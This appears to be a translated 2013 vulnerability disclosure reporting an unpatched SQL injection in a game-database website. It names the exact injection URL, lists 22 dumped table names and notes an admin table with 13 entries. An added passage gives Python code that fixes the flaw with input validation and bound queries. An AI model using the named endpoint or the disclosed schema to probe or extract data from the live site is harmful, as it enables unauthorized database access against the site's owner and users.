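2013-08-29: Details reported to the vendor; awaiting vendor handling.
2013-09-03: The vendor chose to ignore the vulnerability; details disclosed to the public.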
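You know the kind: the most basic SQL injection.
Most of the db lookups run on the same system. The injection point is http://at.db.766.com/search.php?search.php?action=8&start=16&end=30&gwpage=3#gw . Other sites use the same system too, such as the one for Fantasy Westward Journey (梦幻西游) and so on; basically they are sites that have gone unmaintained for years.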
[22 tables]
+-----------------+
| x_admins        |
| x_adminsessions |
| x_at_charaters  |
| x_at_datas      |
| x_at_types      |
| x_attachtypes   |
| x_codes         |
| x_failedlogins  |
| x_gws           |
| x_keywords      |
| x_maps          |
| x_npcs          |
| x_occs          |
| x_rws           |
| x_settings      |
| x_skills        |
| x_styles        |
| x_stylevars     |
| x_templates     |
| x_wps           |
| x_yblevs        |
| x_ybs           |
+-----------------+
Database: db_mhxy
Table: m_admins
[13 entries]
Delete what should be deleted, patch what should be patched.
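One way to do the "patch" part for a search endpoint with numeric paging parameters like those in the reported URL, as an added example that is not code from the original report or from the affected site. It is written in Python with sqlite3 so it runs stand-alone; the `items` table, its columns, the parameter bounds and the helper names are assumptions.

```python
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Parameter names come from the reported URL; the allowed ranges are assumed.
BOUNDS = {"action": (0, 99), "start": (0, 100000),
          "end": (0, 100000), "gwpage": (1, 10000)}

def parse_params(url):
    """Return the query parameters as validated integers, or raise ValueError."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    out = {}
    for name, (lo, hi) in BOUNDS.items():
        values = qs.get(name)
        if not values or len(values) != 1:
            raise ValueError(f"{name}: missing or repeated")
        raw = values[0]
        # isdigit() alone accepts some non-ASCII digits, so require ASCII too.
        if not (raw.isascii() and raw.isdigit()) or len(raw) > 6:
            raise ValueError(f"{name}: not a plain integer")
        val = int(raw)
        if not lo <= val <= hi:
            raise ValueError(f"{name}: out of range")
        out[name] = val
    if out["end"] < out["start"]:
        raise ValueError("end before start")
    return out

def search(conn, url):
    """Run the paged lookup with bound parameters only."""
    p = parse_params(url)
    # Placeholders keep request values as data; nothing is concatenated into SQL.
    return conn.execute(
        "SELECT id, name FROM items WHERE type = ? ORDER BY id LIMIT ? OFFSET ?",
        (p["action"], p["end"] - p["start"], p["start"]),
    ).fetchall()

def demo_db():
    """Constructed in-memory data standing in for the real tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT, type INTEGER)")
    conn.executemany("INSERT INTO items (name, type) VALUES (?, ?)",
                     [(f"item{i}", 8) for i in range(40)])
    return conn
```

Validation and binding are both kept on purpose: the validator rejects malformed requests early, and the placeholders remain the actual protection if a check is ever loosened.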
Severity: no impact; ignored by the vendor
Ignored at: 2013-09-03 18:55
None yet